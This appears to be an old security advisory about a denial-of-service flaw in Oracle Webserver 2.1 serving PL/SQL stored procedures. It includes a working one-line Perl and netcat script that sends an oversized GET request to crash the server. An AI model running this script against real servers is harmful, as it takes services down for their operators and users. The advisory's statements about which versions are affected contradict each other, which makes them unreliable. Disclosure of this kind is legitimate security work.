COMMAND
Oracle Webserver
SYSTEMS AFFECTED
Systems running Oracle Webserver 2.1 with PL/SQL stored procedures
PROBLEM
This is a DoS-attack against a Oracle Webserver 2.1 that serves
PL/SQL stored procedures. The server dumps quietly, Simon
Josefsson haven't found anything in the logs (he reported this).
v2.0 does not seem to exhibit this behaviour (v2.1 is the latest,
but many sites seem to still run v2.0). PL/SQL is, simply put, a
scripting language within the Oracle database.
---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
# prg <host> <port> <path>
#
# example:
# # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
SOLUTION
Nothing yet. v2.0 and after does not seems to be affected by
this. The old Oracle Webserver 1.0.2.0.2 cannot be attacked this
way. There seem to be hard limits of 32 lines HTTP-Request, 1540
chars on the GET/HEAD statement and 4096 chars on every additional
header line.